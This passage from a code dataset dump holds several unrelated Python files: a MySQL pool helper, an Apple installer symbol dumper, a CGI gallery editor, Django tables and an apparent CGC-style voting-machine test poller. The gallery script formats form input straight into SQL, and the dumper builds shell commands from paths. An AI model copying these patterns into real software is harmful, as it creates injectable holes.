池子里一共有多少连接\n @return:\n '''\n return len(self.connect_pool._idle_cache)\n\n 
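    # --- Usage sketch (added by the editor; not part of the original file) ---\n    # Assuming a reachable MySQL server and purely hypothetical credentials, the pool\n    # is built once in __init__ and find() borrows a pooled connection per query;\n    # to_json=True zips cursor.description column names into one dict per row:\n    #\n    #   db = MysqlDB(ip='127.0.0.1', port=3306, db='test', user='root', passwd='secret')\n    #   rows = db.find('SELECT id, name FROM items LIMIT 3', to_json=True)\n    #\n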
@auto_retry\n def find(self, sql, limit=0, to_json=False, cursor=None):\n '''\n @summary:\n 无数据: 返回()\n 有数据: 若limit == 1 则返回 (data1, data2)\n 否则返回 ((data1, data2),)\n ---------\n @param sql:\n @param limit:\n ---------\n @result:\n '''\n conn, cursor = self.get_connection()\n\n cursor.execute(sql)\n\n if limit == 1:\n result = cursor.fetchone() # 全部查出来,截取 不推荐使用\n elif limit > 1:\n result = cursor.fetchmany(limit) # 全部查出来,截取 不推荐使用\n else:\n result = cursor.fetchall()\n\n if to_json:\n columns = [i[0] for i in cursor.description]\n\n # 处理时间类型\n def fix_lob(row):\n def convert(col):\n if isinstance(col, (datetime.date, datetime.time)):\n return str(col)\n elif isinstance(col, str) and (col.startswith('{') or col.startswith('[')):\n try:\n return json.loads(col)\n except:\n return col\n else:\n return col\n\n return [convert(c) for c in row]\n\n result = [fix_lob(row) for row in result]\n result = [dict(zip(columns, r)) for r in result]\n\n self.close_connection(conn, cursor)\n\n return result\n\n def add(self, sql, exception_callfunc=''):\n affect_count = None\n\n try:\n conn, cursor = self.get_connection()\n affect_count = cursor.execute(sql)\n conn.commit()\n\n except Exception as e:\n log.error('''\n error:%s\n sql: %s\n ''' % (e, sql))\n if exception_callfunc:\n exception_callfunc(e)\n finally:\n self.close_connection(conn, cursor)\n\n return affect_count\n\n def add_batch(self, sql, datas):\n '''\n @summary:\n ---------\n @ param sql: insert ignore into (xxx,xxx) values (%s, %s, %s)\n # param datas:[[..], [...]]\n ---------\n @result:\n '''\n affect_count = None\n\n try:\n conn, cursor = self.get_connection()\n affect_count = cursor.executemany(sql, datas)\n conn.commit()\n\n except Exception as e:\n log.error('''\n error:%s\n sql: %s\n ''' % (e, sql))\n finally:\n self.close_connection(conn, cursor)\n\n return affect_count\n\n def update(self, sql):\n try:\n conn, cursor = self.get_connection()\n cursor.execute(sql)\n conn.commit()\n\n except Exception as e:\n log.error('''\n error:%s\n sql: %s\n ''' % (e, sql))\n return False\n else:\n return True\n finally:\n self.close_connection(conn, cursor)\n\n def delete(self, sql):\n try:\n conn, cursor = self.get_connection()\n cursor.execute(sql)\n conn.commit()\n\n except Exception as e:\n log.error('''\n error:%s\n sql: %s\n ''' % (e, sql))\n return False\n else:\n return True\n finally:\n self.close_connection(conn, cursor)\n\n def execute(self, sql):\n try:\n conn, cursor = self.get_connection()\n cursor.execute(sql)\n conn.commit()\n\n except Exception as e:\n log.error('''\n error:%s\n sql: %s\n ''' % (e, sql))\n return False\n else:\n return True\n finally:\n self.close_connection(conn, cursor)\n\n def set_unique_key(self, table, key):\n try:\n sql = 'alter table %s add unique (%s)' % (table, key)\n\n conn, cursor = self.get_connection()\n cursor.execute(sql)\n conn.commit()\n\n except Exception as e:\n log.error(table + ' ' + str(e) + ' key = ' + key)\n return False\n else:\n log.debug('%s表创建唯一索引成功 索引为 %s' % (table, key))\n return True\n finally:\n self.close_connection(conn, cursor)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"db/db_mysql.py","file_name":"db_mysql.py","file_ext":"py","file_size_in_byte":7846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"241016081","text":"from pyage.core.operator import Operator\nfrom pyage.core.emas import EmasAgent\nfrom pyage.core.operator import Operator\nfrom pyage.solutions.evolution.genotype import PointGenotype, 
FloatGenotype\nfrom pyage.core.inject import Inject\nfrom random import uniform\n\nfrom blackbox import rastrigin3\n\nimport hashlib\nfrom random import randrange\n\nclass Cache(dict):\n\n    _instance = None\n\n    def __new__(cls, *args, **kwargs):\n        if not cls._instance:\n            cls._instance = super(Cache, cls).__new__(\n                cls, *args, **kwargs)\n        return cls._instance\n\n\nclass AbstractEvaluation(Operator):\n\n    @Inject(\"scalarm\")\n    def __init__(self):\n        super(AbstractEvaluation, self).__init__(FloatGenotype)\n        self.cache = Cache()\n\n    def _create_key(self, params):\n        h = hashlib.new('md5')\n        h.update(str(params))\n        return h.hexdigest()\n\n\n\nclass ScalarmEmasEvaluation(AbstractEvaluation):\n\n    def process(self, population):\n        genotype = population[0]\n        self.evaluate_genotype(genotype)\n\n\n    def evaluate_genotype(self, genotype):\n        point = genotype.genes\n        key = self._create_key(point)\n        cached = self.cache.get(key, None)\n        if cached:\n            genotype.fitness = cached\n        else:\n            self.scalarm.schedule_point(point)\n            val = self.scalarm.get_result(point)\n            self.cache[key] = val\n            genotype.fitness = val\n\n\nclass ScalarmNormalEvaluation(ScalarmEmasEvaluation):\n\n    # fake_points = [[0.5,0.5,0.5,0.5,0.5,0.5]]*10\n\n    min_index = 0\n\n    def process(self, population):\n\n        points = map(lambda g: g.genes, population)\n        # self.scalarm.schedule_multiple_points(points)\n        for point in points:\n            self.scalarm.schedule_point(point)\n\n        self.scalarm._wait_until(self.scalarm.is_batch_complete, 3600)\n\n        # for point in self.fake_points:\n        #     self.scalarm.schedule_point(point)\n        #\n        # for genotype in population:\n        #     genes = genotype.genes\n        #     genotype.fitness = self.scalarm.get_result(genes)\n        #     print genotype.fitness\n\n        results = self.scalarm.get_results(self.min_index, self.min_index+len(points)-1)\n        self.min_index += len(points)\n\n        for genotype, result in zip(population, results):\n            genotype.fitness = result\n\n\n\ndef scalarm_emas_initializer(dims=2,energy=10,size=100,lowerbound=0.0,upperbound=1.0):\n    agents = {}\n    for i in range(size):\n        agent = EmasAgent(FloatGenotype([uniform(lowerbound, upperbound) for _ in range(dims)]), energy)\n        agents[agent.get_address()] = agent\n    return agents\n","sub_path":"scalarm/interfere.py","file_name":"interfere.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"140265317","text":"def person(salary, grade):\n\n    hra = 20/100*salary\n    da = 50/100*salary\n    pf = 11/100*salary\n\n    # membership test; the original 'is ... or' condition was always truthy\n    if grade in ('A', 'a'):\n        allow = 1700\n    elif grade in ('B', 'b'):\n        allow = 1500\n    else:\n        allow = 1300\n\n    totalSalary = (float(salary + hra + da + allow - pf))\n    # totalSalary = round(int(totalSalary1))\n    # return totalSalary\n    print(\"Total salary is: {}\".format(totalSalary))\n    roundSalary = (int(round(totalSalary)))\n\n    print(\"Basic Salary of Employee is: {} Grade of Allowance is: {} and total salary is Rs. {} and round-off salary is {}\".format(salary, grade, totalSalary, roundSalary))\n\n\nsalary = float(input(\"Enter Salary: \"))\ngrade = str(input(\"Allowance grade is: \").capitalize())\n\nperson(salary, grade)\n","sub_path":"assignment/employee_salary.py","file_name":"employee_salary.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"183490483","text":"#!/usr/bin/env python\n# Copyright 2015 Michael R. Miller. 
See the LICENSE\n# file at the top-level directory of this distribution.\n'''\nPackageSymbolDumper.py\n\nDumps Breakpad symbols for the contents of an Apple update installer. Given a\npath to an Apple update installer as a .dmg or a path to a specific package\nwithin the disk image, PackageSymbolDumper mounts, traverses, and dumps symbols\nfor all applicable frameworks and dylibs found within.\n\nRequired tools for Linux:\n pax\n gzip\n tar\n xar (http://code.google.com/p/xar/)\n xpwn's dmg (https://github.com/planetbeing/xpwn)\n\nCreated on Apr 11, 2012\n\n@author: mrmiller\n'''\nimport argparse\nimport concurrent.futures\nimport errno\nimport logging\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\nfrom scrapesymbols.gathersymbols import process_paths\n\ndef mount_dmg(dmg_extractor, path, mount_point):\n '''\n Mount a disk image at a given mount point.\n\n @param path: a path to the disk image file (.dmg)\n @param mount_point: path at which the image should be mounted\n\n @raise subprocess.CalledProcessError if there is an error mounting\n '''\n if sys.platform == 'darwin':\n subprocess.check_call(['hdiutil', 'attach', path, '-nobrowse', '-mountpoint', mount_point, '-plist'])\n else:\n with tempfile.NamedTemporaryFile() as f:\n subprocess.check_call([dmg_extractor, 'extract', path, f.name])\n subprocess.check_call(['mount', '-o', 'loop', f.name, mount_point])\n\ndef unmount_dmg(mount_point):\n '''\n Unmount a mounted disk image given its mount point.\n\n @param mount_point: path where the image is mounted, e.g. \"/Volumes/test\"\n\n @raise subprocess.CalledProcessError if there is an error unmounting\n '''\n if sys.platform == 'darwin':\n subprocess.check_call(['hdiutil', 'detach', mount_point])\n else:\n subprocess.check_call(['umount', mount_point])\n\ndef expand_pkg(pkg_path, out_path):\n '''\n Expands the contents of an installer package to some directory.\n\n @param pkg_path: a path to an installer package (.pkg)\n @param out_path: a path to hold the package contents\n '''\n subprocess.check_call('cd \"{dest}\" && xar -x -f \"{src}\"'.format(src=pkg_path, dest=out_path), shell=True)\n\ndef filter_files(function, path):\n '''\n Yield file paths matching a filter function by walking the\n hierarchy rooted at path.\n\n @param function: a function taking in a filename that returns true to\n include the path\n @param path: the root path of the hierarchy to traverse\n '''\n for root, _dirs, files in os.walk(path):\n for filename in files:\n if function(filename):\n yield os.path.join(root, filename)\n\ndef find_packages(path):\n '''\n Returns a list of installer packages (as determined by the .pkg extension)\n found within path.\n\n @param path: root path to search for .pkg files\n '''\n return filter_files(lambda filename:\n os.path.splitext(filename)[1] == '.pkg',\n path)\n\ndef find_all_packages(paths):\n '''\n Yield installer package files found in all of `paths`.\n\n @param path: list of root paths to search for .pkg files\n '''\n for path in paths:\n for pkg in find_packages(path):\n yield pkg\n\ndef find_payloads(path):\n '''\n Returns a list of possible installer package payload paths.\n\n @param path: root path for an installer package\n '''\n return filter_files(lambda filename:\n 'Payload' in filename or '.pax.gz' in filename,\n path)\n\ndef extract_payload(payload_path, output_path):\n '''\n Extracts the contents of an installer package payload to a given directory.\n\n @param payload_path: path to an installer package's payload\n @param 
output_path: output path for the payload's contents\n @return True for success, False for failure.\n '''\n header = open(payload_path, 'rb').read(2)\n if header == 'BZ':\n extract = 'bzip2'\n elif header == '\\x1f\\x8b':\n extract = 'gzip'\n else:\n # Unsupported format\n logging.error('Unknown payload format: 0x{0:x}{1:x}'.format(ord(header[0]), ord(header[1])))\n return False\n try:\n # XXX: This sucks because if the extraction fails pax will hang with\n # a prompt instead of just failing.\n subprocess.check_call('cd {dest} && {extract} -dc {payload} | pax -r -k -s \":^/::\"'.format(extract=extract, payload=payload_path, dest=output_path), shell=True)\n return True\n except subprocess.CalledProcessError:\n return False\n\n\ndef shutil_error_handler(caller, path, excinfo):\n logging.error('Could not remove \"{path}\": {info}'.format(path=path, info=excinfo))\n\n\ndef write_symbol_file(dest, filename, contents):\n full_path = os.path.join(dest, filename)\n try:\n os.makedirs(os.path.dirname(full_path))\n open(full_path, 'wb').write(contents)\n except os.error as e:\n if e.errno != errno.EEXIST:\n raise\n\ndef dump_symbols_from_payload(executor, dump_syms, payload_path, dest):\n '''\n Dumps all the symbols found inside the payload of an installer package.\n\n @param dump_syms: path to the dump_syms executable\n @param payload_path: path to an installer package's payload\n @param dest: output path for symbols\n '''\n temp_dir = None\n logging.info('Dumping symbols from payload: ' + payload_path)\n try:\n temp_dir = tempfile.mkdtemp()\n logging.info('Extracting payload to {path}.'.format(path=temp_dir))\n if not extract_payload(payload_path, temp_dir):\n logging.error('Could not extract payload: ' + payload_path)\n return\n\n # dump the symbols for the payload contents\n system_library = os.path.join('System', 'Library')\n subdirectories = [os.path.join(system_library, 'Frameworks'), os.path.join(system_library, 'PrivateFrameworks'), os.path.join('usr', 'lib')]\n paths_to_dump = map(lambda d: os.path.join(temp_dir, d), subdirectories)\n\n for filename, contents in process_paths(paths_to_dump, executor, dump_syms, False, platform='darwin'):\n if filename and contents:\n write_symbol_file(dest, filename, contents)\n\n finally:\n if temp_dir is not None:\n shutil.rmtree(temp_dir, onerror=shutil_error_handler)\n\ndef dump_symbols_from_package(executor, dump_syms, pkg, dest):\n '''\n Dumps all the symbols found inside an installer package.\n\n @param dump_syms: path to the dump_syms executable\n @param pkg: path to an installer package\n @param dest: output path for symbols\n '''\n temp_dir = None\n logging.info('Dumping symbols from package: ' + pkg)\n try:\n temp_dir = tempfile.mkdtemp()\n expand_pkg(pkg, temp_dir)\n\n # check for any subpackages\n for subpackage in find_packages(temp_dir):\n logging.warning('UNTESTED: Found subpackage at: ' + subpackage)\n dump_symbols_from_package(executor, dump_syms, subpackage, dest)\n\n # dump symbols from any payloads (only expecting one) in the package\n for payload in find_payloads(temp_dir):\n dump_symbols_from_payload(executor, dump_syms, payload, dest)\n\n finally:\n if temp_dir is not None:\n shutil.rmtree(temp_dir, onerror=shutil_error_handler)\n\n\ndef read_processed_packages(tracking_file):\n if tracking_file is None or not os.path.exists(tracking_file):\n return set()\n\n return set(open(tracking_file, 'rb').read().splitlines())\n\n\ndef write_processed_packages(tracking_file, processed_packages):\n if tracking_file is None:\n return\n\n 
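    # (added by the editor) One processed .pkg path is written per line;\n    # read_processed_packages() reloads this set on the next run, so installers\n    # that were already dumped are skipped by main().\n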
open(tracking_file, 'wb').write('\\n'.join(processed_packages))\n\n\ndef main(args):\n if not args.search or not all(os.path.exists(p) for p in args.search):\n logging.error('Invalid search path')\n return\n if not os.path.exists(args.to):\n logging.error('Invalid path to destination')\n return\n\n processed_packages = read_processed_packages(args.tracking_file)\n executor = concurrent.futures.ProcessPoolExecutor()\n for pkg in find_all_packages(args.search):\n if pkg not in processed_packages:\n dump_symbols_from_package(executor, args.dump_syms, pkg, args.to)\n processed_packages.add(pkg)\n write_processed_packages(args.tracking_file, processed_packages)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Extracts Breakpad symbols from a Mac OS X support update.')\n parser.add_argument('--dmg', default='dmg', type=str,\n help='path to the xpwn dmg extractor, ' +\n 'if running on Linux')\n parser.add_argument('--dump_syms', default='dump_syms', type=str,\n help='path to the Breakpad dump_syms executable')\n parser.add_argument('--tracking-file', type=str,\n help='Path to a file in which to store information ' +\n 'about already-processed packages')\n parser.add_argument('search', nargs='+',\n help='Paths to search recursively for packages')\n parser.add_argument('to', type=str, help='destination path for the symbols')\n args = parser.parse_args()\n\n logging.getLogger().setLevel(logging.DEBUG)\n\n main(args)\n","sub_path":"PackageSymbolDumper.py","file_name":"PackageSymbolDumper.py","file_ext":"py","file_size_in_byte":9397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"154041855","text":"import cgi\nimport pymysql\nimport cgitb\ncgitb.enable()\ndb = pymysql.connect(host = 'localhost',\n\t\t\t\t\tuser = 'gallery',\n\t\t\t\t \tpasswd = 'eecs118',\n\t\t\t\t\tdb = 'gallery',\n\t\t\t\t\tautocommit = True)\nform = cgi.FieldStorage()\ncur = db.cursor()\nprint(\"Content-Type: text/html\")\nprint()\n\nid = form.getvalue(\"galleryvalue\")\n\nprint(\"\"\"\n\t
<!-- HTML form markup removed during extraction -->\n\t\"\"\")\n\nif form.getvalue(\"new_g_name\") is not None:\n\tcur.execute(\"UPDATE gallery SET name=\\\"{0}\\\" WHERE gallery_id={1}\".format(form.getvalue(\"new_g_name\"),int(id)))\n\tdb.commit()\nif form.getvalue(\"new_g_desc\") is not None:\n\tcur.execute(\"UPDATE gallery SET description=\\\"{0}\\\" WHERE gallery_id={1}\".format(form.getvalue(\"new_g_desc\"),int(id)))\n\tdb.commit()\n\nprint(\"
    \")","sub_path":"EECS 118/mp3/editgallery.py","file_name":"editgallery.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"579986066","text":"import uuid\n\nfrom django.http import HttpRequest\nfrom django.template.loader import render_to_string\nfrom django_tables2 import tables, RequestConfig\nfrom django.utils.translation import gettext_lazy as _\n\nfrom MrMap.columns import MrMapColumn\nfrom MrMap.consts import DJANGO_TABLES2_BOOTSTRAP4_CUSTOM_TEMPLATE\nfrom MrMap.settings import PAGE_SIZE_OPTIONS, PAGE_SIZE_MAX, PAGE_SIZE_DEFAULT, PAGE_DEFAULT\nfrom structure.permissionEnums import PermissionEnum\nfrom users.helper import user_helper\n\n\nclass MrMapTable(tables.Table):\n filter_set = None\n pagination = {}\n page_field = None\n caption = \"\"\n\n def __init__(self,\n request=None,\n filter_set_class=None,\n queryset=None,\n query_filter=None,\n query_class=None,\n current_view=None,\n param_lead='mr-map-t',\n *args,\n **kwargs):\n # Generate a random id for html template\n self.table_id = str(uuid.uuid4())\n self.request = request\n self.filter_set_class = filter_set_class\n self.queryset = queryset\n self.user = user_helper.get_user(request)\n self.current_view = current_view\n self.param_lead = param_lead\n\n self.permission_lookup = {}\n\n # He we set the data kw dynamic by the query_class and query_filter,\n # so we don't need to set the data kw in every view again and again\n # ToDo: it's a little bit messy... refactor this if/else\n if queryset is not None:\n if filter_set_class:\n self._configure_filter_set()\n kwargs['data'] = self.filter_set.qs\n else:\n kwargs['data'] = queryset\n elif query_class:\n if query_filter:\n if filter_set_class:\n self._configure_filter_set(queryset=query_class.objects.filter(query_filter))\n kwargs['data'] = self.filter_set.qs\n else:\n data = query_class.objects.filter(query_filter)\n else:\n if filter_set_class:\n self._configure_filter_set(queryset=query_class.objects.all())\n kwargs['data'] = self.filter_set.qs\n else:\n data = query_class.objects.all()\n kwargs['data'] = data\n\n super(MrMapTable, self).__init__(template_name=DJANGO_TABLES2_BOOTSTRAP4_CUSTOM_TEMPLATE, *args, **kwargs)\n self._configure_pagination()\n\n def _configure_filter_set(self, queryset=None):\n self.filter_set = self.filter_set_class(\n data=self.request.GET,\n queryset=queryset or self.queryset,\n request=self.request,\n )\n\n def _configure_pagination(self):\n RequestConfig(self.request).configure(self)\n self.prepare_table_pagination_settings(self.request, self.param_lead)\n self.page_field = self.pagination.get('page_name')\n self.paginate(page=self.request.GET.get(self.pagination.get('page_name'), PAGE_DEFAULT),\n per_page=self.request.GET.get(self.pagination.get('page_size_param'), PAGE_SIZE_DEFAULT))\n\n def check_render_permission(self, permission: PermissionEnum):\n has_perm = self.permission_lookup.get(permission, None)\n if has_perm is None:\n has_perm = self.user.has_perm(perm=permission)\n self.permission_lookup[permission] = has_perm\n return has_perm\n\n\n def prepare_table_pagination_settings(self, request: HttpRequest, param_lead: str):\n return self.prepare_list_pagination_settings(request, param_lead)\n\n def prepare_list_pagination_settings(self, request: HttpRequest, param_lead: str):\n len_rows = len(self.rows)\n page_size_options = list(filter(lambda item: item <= len_rows, PAGE_SIZE_OPTIONS))\n\n if len_rows not in page_size_options:\n 
page_size_options.append(len_rows)\n\n page_size_options = list(filter(lambda item: item <= PAGE_SIZE_MAX, page_size_options))\n\n self.pagination = {'page_size_param': param_lead + '-size',\n 'page_size_options': page_size_options,\n 'page_name': param_lead + '-page'\n }\n\n if PAGE_SIZE_DEFAULT <= page_size_options[-1]:\n page_size = PAGE_SIZE_DEFAULT\n else:\n page_size = page_size_options[-1]\n\n self.pagination.update({'page_size': request.GET.get(self.pagination.get('page_size_param'), page_size)})\n\n\nclass ActionTableMixin(tables.Table):\n actions = MrMapColumn(\n verbose_name=_('Actions'),\n tooltip=_('Actions you can perform'),\n empty_values=[],\n orderable=False,\n attrs={\"td\": {\"class\": \"text-right\",\n \"style\": \"white-space:nowrap; width: auto !important;\"},\n \"th\": {\"style\": \"width: 1px;\"}\n }\n )\n\n\n","sub_path":"mrmap/MrMap/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"115367123","text":"#!/usr/bin/env python\n#\n# Copyright (C) 2014 Narf Industries \n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\n# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\n# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\n# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n#\n\nfrom generator.actions import Actions, Variable\nfrom random import choice, randint\nfrom os.path import dirname, abspath, join\nimport sys\nimport struct\n\n\nsys.path.append(join(dirname(dirname(dirname(abspath(__file__)))), \"support\"))\nimport support as sp\nfrom common import DEBUG, CONFIG\nfrom election import Election, ElectionManager, Voter, Candidate, Vote\n\nclass VotingMachine(Actions):\n\n ELECTION_NAME = \"Enter election name: \"\n ELECTION_CREATED = \"Election Created.\\n\"\n ELECTION_OPEN = \"Voting Open.\\n\"\n ELECTION_CLOSED = \"Voting Closed.\\n\"\n CREATE_E_MGR = \"## Create election manager ##\\n\"\n CREATE_VOTER = \"## Create voter ##\\n\"\n CREATE_CANDIDATE = \"## Create candidate ##\\n\"\n CANDIDATE_ADDED = \"Candidate Added.\\n\"\n CANDIDATE_INVALID = \"New candidate invalid\\n\"\n\n ZERO_CANDIDATES = \"\\tThere were zero candidates.\\n\"\n CANDIDATE_ORDER = \"\\t| Rank | Votes | Candidate Name |\\n\"\n ZERO_VOTERS = \"\\tThere were zero voters.\\n\"\n VOTER_ORDER = \"\\t| Voted? | Voter Name |\\n\"\n\n VOTING_RESULTS = \"## Voting Results ##\\n\"\n CANDIDATE_SUMMARY = \"## Candidate Summary ##\\n\"\n VOTER_TURNOUT = \"## Voter Turnout ##\\n\"\n\n SELECT_CANDIDATE = \"Select one candidate from the folloowing:\\n\"\n EMPTY_CANDIDATES = \"There are no candidates. 
Go add some.\\n\"\n FULL_CANDIDATES = \"Not accepting additional candidates.\\n\"\n INVALID_CANDIDATE = \"Invalid candidate. Try again.\\n\"\n\n F_NAME = \"\\tEnter first name: \"\n L_NAME = \"\\tEnter last name: \"\n\n ENTER_ID = \"\\tEnter your ID number: \"\n ENTER_AUTH_KEY = \"\\tEnter auth key: \"\n NEW_AUTH_KEY = \"\\tYour auth key is: \"\n NEW_UID = \"\\tYour ID number is: \"\n\n NUM_WINNERS_Q = \"Enter number of election winners desired: \"\n MAX_CANDIDATES_Q = \"Enter the max number of candidates allowed: \"\n WRITE_IN_OK_Q = \"Can voters write-in new candidates? (Yy/Nn): \"\n\n CHOOSE = \"Choose an option: \"\n\n MENU_LOGIN = \"14: Login\\n\"\n MENU_MAIN = \"15: Main Menu\\n\"\n MENU_CREATE_ELECTION = \"17: Create Election\\n\"\n MENU_OPEN_VOTING = \"18. Open Voting\\n\"\n MENU_CLOSE_VOTING = \"20. Close Voting\\n\"\n MENU_ELECTION_STATUS = \"22. Election Status\\n\"\n\n MENU_REGISTER_VOTER = \"38. Register Voter\\n\"\n MENU_VOTE = \"36. Vote\\n\"\n MENU_ADD_CANDIDATE = \"54. Add Candidate\\n\"\n MENU_VOTING_RESULTS = \"56. Voting Results\\n\"\n MENU_VOTER_TURNOUT = \"72. Voter Turnout\\n\"\n MENU_CANDIDATE_SUMMARY = \"88. Candidate Summary\\n\"\n\n MENU_QUIT = \"95. Quit\\n\"\n\n FAIL = \"Is voting too hard?!\\n\"\n\n MENU_ENTRIES = {\n 0x0E: MENU_LOGIN,\n 0x0F: MENU_MAIN,\n\n 0x11: MENU_CREATE_ELECTION,\n 0x12: MENU_OPEN_VOTING,\n 0x14: MENU_CLOSE_VOTING,\n 0x16: MENU_ELECTION_STATUS,\n\n 0x24: MENU_VOTE,\n 0x26: MENU_REGISTER_VOTER,\n\n 0x36: MENU_ADD_CANDIDATE,\n\n 0x38: MENU_VOTING_RESULTS,\n 0x48: MENU_VOTER_TURNOUT,\n 0x58: MENU_CANDIDATE_SUMMARY,\n\n 0x5F: MENU_QUIT,\n }\n\n def _receive_by_len(self, a_str, delim='', term=''):\n line = \"{0}{1}{2}\".format(a_str, delim, term)\n self.read(length=len(line), expect=line)\n\n def _receive_by_delim(self, delim=''):\n self.read(delim=delim)\n\n def _send_str(self, cmd):\n self.write(sp.pack_single_string(\"{0}{1}\".format(cmd, CONFIG['DELIM'])))\n\n def _receive_prompt_send_answer(self, prompt, answer):\n self._receive_by_len(prompt, term=CONFIG['TERM'])\n self._send_str(answer)\n\n # def _recv_name(self, name):\n # # recv NNAME prompt\n # self._recv_string(self.NNAME)\n # # recv name\n # self._recv_string(name)\n\n def _send_first_last_name(self, f_name, l_name):\n self._receive_prompt_send_answer(self.F_NAME, f_name)\n self._receive_prompt_send_answer(self.L_NAME, l_name)\n\n\n # def _recv_string(self, aStr):\n # self.read(delim=CONFIG['TERM'], expect=sp.pack_single_string(aStr))\n\n # def _recv_conf_num(self):\n # self.read(length=8, expect=sp.pack_single_uint64(self._get_next_conf_num()))\n\n # def _recv_next_tid(self, citizen=None):\n # if citizen is not None:\n # s = self.magic_page[ord(citizen.name[0])]\n # s += self.magic_page[ord(citizen.name[1])]\n # s += self.magic_page[ord(citizen.name[2])]\n # s += self.magic_page[ord(citizen.name[3])]\n # if DEBUG:\n # print \"tid:{0}{1}{2}{3}\".format(hex(ord(s[0]))[2:], hex(ord(s[1]))[2:], hex(ord(s[2]))[2:], hex(ord(s[3]))[2:])\n # # self.read(length=4, expect=sp.pack_single_string(s))\n # self.read(length=4, expect=sp.pack_single_string(s), assign=self.state['tid'])\n # else:\n # self.read(length=4, expect=r'(.*)', expect_format='pcre')\n\n # def _get_next_conf_num(self):\n # self.state['cn'] += 1\n # return self.state['cn'] - 1\n\n def _is_menu_id_valid_op(self, menu_id):\n creds = False\n op = 0 != (menu_id & self.state['e'].state)\n\n if 0x0E == menu_id:\n creds = (False == self.state['e'].have_authd_user())\n elif 0x0F == menu_id:\n creds = (True == 
self.state['e'].have_authd_user())\n\n elif 0x11 == menu_id:\n creds = (False == self.state['e'].have_authd_user())\n elif 0x12 == menu_id:\n creds = (True == self.state['e'].have_authd_e_mgr())\n elif 0x14 == menu_id:\n creds = (True == self.state['e'].have_authd_e_mgr())\n elif 0x16 == menu_id:\n creds = (True == self.state['e'].have_authd_e_mgr())\n\n elif 0x24 == menu_id:\n creds = (True == self.state['e'].have_authd_voter())\n elif 0x26 == menu_id:\n creds = (False == self.state['e'].have_authd_user())\n\n elif 0x36 == menu_id:\n creds = (((True == self.state['e'].have_authd_e_mgr()) or \\\n ((True == self.state['e'].have_authd_user()) and (1 == self.state['e'].write_in_ok))) and \\\n (self.state['e'].get_candidate_count() < self.state['e'].max_candidates))\n\n elif 0x38 == menu_id:\n creds = (True == self.state['e'].have_authd_user())\n elif 0x48 == menu_id:\n creds = (True == self.state['e'].have_authd_e_mgr())\n elif 0x58 == menu_id:\n creds = (True == self.state['e'].have_authd_e_mgr())\n else:\n creds = False\n\n return op and creds\n\n def _receive_fail(self):\n self._receive_by_len(self.FAIL, term=CONFIG['TERM'])\n\n def _process_menu(self):\n '''\n Receive the relevant lines in the menu.\n\n # login_menu\n # admin_menu\n # voting_menu\n # results_menu\n # quit entry\n '''\n cmds = self.MENU_ENTRIES.keys()\n cmds.sort()\n menu = ''\n for m_id in cmds:\n if True == self._is_menu_id_valid_op(m_id):\n menu += self.MENU_ENTRIES[m_id] + CONFIG['TERM']\n\n menu += self.MENU_QUIT + CONFIG['TERM']\n self._receive_by_len(menu)\n\n self._receive_by_len(self.CHOOSE, term=CONFIG['TERM'])\n\n def _back_to_main_menu(self):\n '''\n Option to go from sub_menu back to main_menu.\n '''\n self._process_menu()\n\n cmd = 0x0F\n self._send_str(cmd)\n\n if True == self._is_menu_id_valid_op(cmd):\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _create_election(self):\n '''\n Create the election manager profile and setup the election parameters\n '''\n self._process_menu()\n\n self.state['e'].authd_user = None\n\n cmd = 0x11\n self._send_str(cmd)\n\n if True == self._is_menu_id_valid_op(cmd):\n\n # create election mgr\n self._receive_by_len(self.CREATE_E_MGR, term=CONFIG['TERM'])\n mgr = self.state['e'].make_random_e_mgr()\n self._send_first_last_name(mgr.f_name, mgr.l_name)\n self._receive_by_len(self.NEW_UID)\n self._receive_by_len(mgr.id, delim=CONFIG['DELIM'])\n self._receive_by_len(self.NEW_AUTH_KEY)\n auth_key = Variable('authkey')\n auth_key.set_slice(0)\n self.read(delim=CONFIG['DELIM'], assign=auth_key)\n self.state['e'].set_e_mgr_auth_key(auth_key)\n\n # send election name\n self._receive_prompt_send_answer(self.ELECTION_NAME, self.state['e'].name)\n\n # set election conf\n num_winners = randint(1, 4)\n max_candidates = randint(5, 20)\n write_in_ok = choice(['Y', 'N'])\n self._receive_prompt_send_answer(self.NUM_WINNERS_Q, num_winners)\n self._receive_prompt_send_answer(self.MAX_CANDIDATES_Q, max_candidates)\n self._receive_prompt_send_answer(self.WRITE_IN_OK_Q, write_in_ok)\n\n self.state['e'].num_winners = num_winners\n self.state['e'].max_candidates = max_candidates\n self.state['e'].write_in_ok = 1 if 'Y' == write_in_ok else 0\n 